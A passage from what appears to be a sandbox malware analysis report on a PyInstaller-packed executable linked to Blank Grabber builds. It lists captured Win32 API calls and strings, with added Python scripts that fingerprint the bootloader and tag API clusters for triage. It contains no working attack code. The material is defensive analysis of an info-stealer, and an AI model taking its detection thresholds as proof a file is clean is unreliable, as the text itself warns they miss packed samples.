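    tcl_hits = sorted(TCL_TK & found)
    return {
        "resolver_error_string": RESOLVER_FMT in found,
        "py_capi_symbols": py_hits,
        "tcl_tk_symbols": tcl_hits,
        # PyConfig_*/PyPreConfig_* were introduced in CPython 3.8 (PEP 587),
        # so their presence rules out an older embedded interpreter.
        "python_ge_3_8": any(
            s.startswith(("PyConfig_", "PyPreConfig_")) for s in py_hits
        ),
        # Thresholds are an assumption: require the error format string plus
        # several C-API names so a stray "Failed to get address" alone does
        # not fire.
        "is_pyinstaller_bootloader": RESOLVER_FMT in found and len(py_hits) >= 3,
        "loads_tcl_tk": len(tcl_hits) >= 2,
    }


def _blob(strings: list[str]) -> bytes:
    """Constructed stand-in for a PE: an MZ header followed by NUL-separated
    strings, enough for ascii_strings() to split them the way `strings` would."""
    body = b"\x00".join(s.encode("ascii") for s in strings)
    return b"MZ\x90\x00" + b"\x00" * 16 + body + b"\x00"


# Constructed samples (not real dumps): one mimicking the bootloader's string
# table, one with no indicators at all.
SAMPLE_BOOTLOADER = _blob(
    [RESOLVER_FMT, "GetProcAddress", *sorted(PY_CAPI), *sorted(TCL_TK)]
)
SAMPLE_PLAIN = _blob(["Hello, world", "kernel32.dll", "GetProcAddress"])


if __name__ == "__main__":
    import json
    import sys

    target = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BOOTLOADER
    print(json.dumps(fingerprint(target), indent=2))
```

Run it against the dumped image (`python fingerprint.py phost.dmp`) or with no argument to score the constructed sample. Because the bootloader resolves these symbols by name from the bundled python3x.dll, the indicator survives icon changes and renaming of the executable, which is why the strings are a better pivot than the file hash when hunting for repacked Blank Grabber builds; it does not survive a packer that encrypts the bootloader's string table, so treat a negative result as "not obviously PyInstaller" rather than "clean".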
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
APIs
Strings
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
Strings
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF62CC73CBB), ref: 00007FF62CC788F4
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF62CC73CBB), ref: 00007FF62CC788FA
• CreateDirectoryW.KERNEL32(?,00000000,00007FF62CC73CBB), ref: 00007FF62CC7893C
  • Part of subcall function 00007FF62CC78A20: GetEnvironmentVariableW.KERNEL32(00007FF62CC7388E), ref: 00007FF62CC78A57
  • Part of subcall function 00007FF62CC78A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF62CC78A79
  • Part of subcall function 00007FF62CC882A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC882C1
  • Part of subcall function 00007FF62CC72810: MessageBoxW.USER32 ref: 00007FF62CC728EA
Strings
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF62CC8F11A,?,?,000001AE1B2296E8,00007FF62CC8ADC3,?,?,?,00007FF62CC8ACBA,?,?,?,00007FF62CC85FAE), ref: 00007FF62CC8EEFC
• GetProcAddress.KERNEL32(?,?,?,00007FF62CC8F11A,?,?,000001AE1B2296E8,00007FF62CC8ADC3,?,?,?,00007FF62CC8ACBA,?,?,?,00007FF62CC85FAE), ref: 00007FF62CC8EF08
Strings
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction ID: ba84b8ed72b7d6acf3bd2c08ec4217b2942624cd64973867c96c84c2aeef3cd7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F4114A5B19A5282FF16CB1A9C1497622B1BF49BF0F884239ED1DC7384EF3CE4058342
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDBD
• GetLastError.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDCB
• LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDF5
• FreeLibrary.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DE63
• GetProcAddress.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DE6F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
• Instruction ID: c999403295026f7ed86a3d74d52f8c8c4901220a9f0d82ff47d6f98e20ee00d3
• Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
• Instruction Fuzzy Hash: DE31A321B1AB4291EE229B0AAC0057523F8FF58BB4F595535ED1D8B3C0EF3CE4499356
APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
• Instruction ID: c166246b85d03a646761b3896349f19c8ff6b633cd934497a3b87f2dd3d656c6
• Opcode Fuzzy Hash: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
• Instruction Fuzzy Hash: 4F215E31B0CA4282EF109B59F85423AA7B4FF857B4F104235EAAD87AE5DE7CD4498701
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
• Instruction ID: 1b20762d8290de707d8bfdaacb36347c4d0dda70141b01bee13fbbf1d4457005
• Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
• Instruction Fuzzy Hash: 4B117231B18A4186EB608B5AAC6433972B0FB88BF8F004234D95DC7794DF7CD8148742
APIs
• GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78592
• K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC785E9
  • Part of subcall function 00007FF62CC79400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62CC745E4,00000000,00007FF62CC71985), ref: 00007FF62CC79439
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78678
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC786E4
• FreeLibrary.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC786F5
• FreeLibrary.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC7870A
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
• Instruction ID: 14c4aed2e1edbb137f0b8f72aa0ff2fcdbd1536768575b5cb22cfd846b2f31ee
• Opcode Fuzzy Hash: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
• Instruction Fuzzy Hash: F2419322B1868241EE709B19A9406BA63B8FF84BE4F440135EF4DEBB89DE3CD445D702
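The function entries in this part of the report list each function's Win32 calls as "Name.MODULE(args), ref: address" lines (with "Part of subcall function" lines for callees) followed by a Similarity block; when a report runs to thousands of such entries, a small parser that groups the calls per function and tags recognisable API clusters speeds up triage. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin. The sample text is constructed from entries in this section (addresses copied from the report), and the capability labels (`dynamic-import-resolution`, `loaded-module-enumeration`, `token-sid-lookup`) are this example's own assumptions for triage, not Joe Sandbox signature names.

```python
"""Parse the per-function 'APIs' blocks of a Joe Sandbox report dump and
tag each function with the Win32 API cluster its calls imply."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: three entries in the shape of the report's function
# entries (addresses copied from the report, text otherwise trimmed).
SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA), ref: 00007FF62CC7DDBD
• GetLastError.KERNEL32(?,?,?,00007FF62CC7DFEA), ref: 00007FF62CC7DDCB
• LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA), ref: 00007FF62CC7DDF5
• FreeLibrary.KERNEL32(?,?,?,00007FF62CC7DFEA), ref: 00007FF62CC7DE63
• GetProcAddress.KERNEL32(?,?,?,00007FF62CC7DFEA), ref: 00007FF62CC7DE6F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
APIs
• GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78592
• K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC785E9
  • Part of subcall function 00007FF62CC79400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62CC745E4,00000000,00007FF62CC71985), ref: 00007FF62CC79439
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78678
• FreeLibrary.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC786F5
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
APIs
  • Part of subcall function 00007FF62CC78760: OpenProcessToken.ADVAPI32 ref: 00007FF62CC78793
  • Part of subcall function 00007FF62CC78760: GetTokenInformation.ADVAPI32 ref: 00007FF62CC787B8
  • Part of subcall function 00007FF62CC78760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62CC7881E
  • Part of subcall function 00007FF62CC78760: CloseHandle.KERNEL32 ref: 00007FF62CC78836
• LocalFree.KERNEL32(?,00007FF62CC73C55), ref: 00007FF62CC7916C
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
"""

# One API line: optional "Part of subcall function <addr>:" prefix, then
# Name.MODULE, optional "(args)", optional comma, then "ref: <addr>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# Similarity fields we keep ("API String ID" deliberately does not match).
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID):\s*(?P<val>.*)$")

Call = Tuple[str, str, str, Optional[str]]  # (api, module, ref, subcall address)

# Triage labels: an entry gets a label when every API in the set appears in
# its direct calls or subcalls. These names are this example's own.
CAPABILITIES: Dict[str, frozenset] = {
    "dynamic-import-resolution": frozenset({"LoadLibraryExW", "GetProcAddress"}),
    "loaded-module-enumeration": frozenset({"K32EnumProcessModules", "K32GetModuleFileNameExW"}),
    "token-sid-lookup": frozenset({"OpenProcessToken", "GetTokenInformation", "ConvertSidToStringSidW"}),
}


def parse_entries(text: str) -> List[Dict]:
    """Split the dump at each 'APIs' header and collect calls and IDs per entry."""
    entries: List[Dict] = []
    cur: Optional[Dict] = None
    for raw in text.splitlines():
        if raw.strip() == "APIs":
            cur = {"calls": [], "subcalls": [], "api_id": "", "string_id": ""}
            entries.append(cur)
            continue
        if cur is None:  # text before the first entry (e.g. a cut-off entry)
            continue
        m = API_LINE.match(raw)
        if m:
            sub = m["sub"].upper() if m["sub"] else None
            call: Call = (m["api"], m["mod"], m["ref"].upper(), sub)
            (cur["subcalls"] if sub else cur["calls"]).append(call)
            continue
        f = FIELD_LINE.match(raw)
        if f:
            cur["api_id" if f["key"] == "API ID" else "string_id"] = f["val"].strip()
    return entries


def api_names(entry: Dict) -> set:
    return {c[0] for c in entry["calls"]} | {c[0] for c in entry["subcalls"]}


def tag_capabilities(entry: Dict) -> List[str]:
    names = api_names(entry)
    return sorted(tag for tag, need in CAPABILITIES.items() if need <= names)


def summarize(text: str) -> List[Tuple[str, List[str]]]:
    """(lowest direct-call ref address, tags) per entry, in report order."""
    out = []
    for e in parse_entries(text):
        refs = [c[2] for c in e["calls"]] or [c[2] for c in e["subcalls"]]
        out.append((min(refs) if refs else "", tag_capabilities(e)))
    return out


if __name__ == "__main__":
    for first_ref, tags in summarize(SAMPLE):
        print(first_ref, ", ".join(tags) or "-")
```

The lowest direct-call address is used only as a stable handle for each entry, since the report does not print the function's own start address; adjust `CAPABILITIES` to the clusters that matter for the sample under review.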
APIs
  • Part of subcall function 00007FF62CC78760: GetCurrentProcess.KERNEL32 ref: 00007FF62CC78780
  • Part of subcall function 00007FF62CC78760: OpenProcessToken.ADVAPI32 ref: 00007FF62CC78793
  • Part of subcall function 00007FF62CC78760: GetTokenInformation.ADVAPI32 ref: 00007FF62CC787B8
  • Part of subcall function 00007FF62CC78760: GetLastError.KERNEL32 ref: 00007FF62CC787C2
  • Part of subcall function 00007FF62CC78760: GetTokenInformation.ADVAPI32 ref: 00007FF62CC78802
  • Part of subcall function 00007FF62CC78760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62CC7881E
  • Part of subcall function 00007FF62CC78760: CloseHandle.KERNEL32 ref: 00007FF62CC78836
• LocalFree.KERNEL32(?,00007FF62CC73C55), ref: 00007FF62CC7916C
• LocalFree.KERNEL32(?,00007FF62CC73C55), ref: 00007FF62CC79175
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62CC71B6A), ref: 00007FF62CC7295E
Strings
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF62CC71B99), ref: 00007FF62CC72760
Strings
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
APIs
Strings
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
APIs
Strings
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF62CC7352C,?,00000000,00007FF62CC73F23), ref: 00007FF62CC77F22
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                              • Instruction ID: ce0b23117cffd9741204111f3d758072f330bca0d4929f9d4084e34202f3c580
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9731D661719AC545FF218B29EC503AA6378EF84BF4F044231EA6D8BBC9DE2CD649D701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction ID: 24a560f3479708726e57acc49923e0921f0c0e9960ba8f992fff7ca860bd29c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6821DE73B08B4192EB209B19F8447EA63B4FB88794F404136EE8D9776ADE3CD249C741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction ID: d8d26d22b35318288283e7525eb07668d1e85dade767e9df46366f2c9971b01a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D11472B19A818AEB11CF69D8406ED37B1FB447E8B448236DE5ED7B89DE38D046C341
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62CC8CFBB), ref: 00007FF62CC8D0EC
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62CC8CFBB), ref: 00007FF62CC8D177
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction ID: 77335aec0e42fd1705b22e2900202b89684c68aab3852969dafa40764a352c3d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B919472F1865295FB519F699C40ABE2BB0AF44BE8F144239DE0ED7685DF38D4828701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
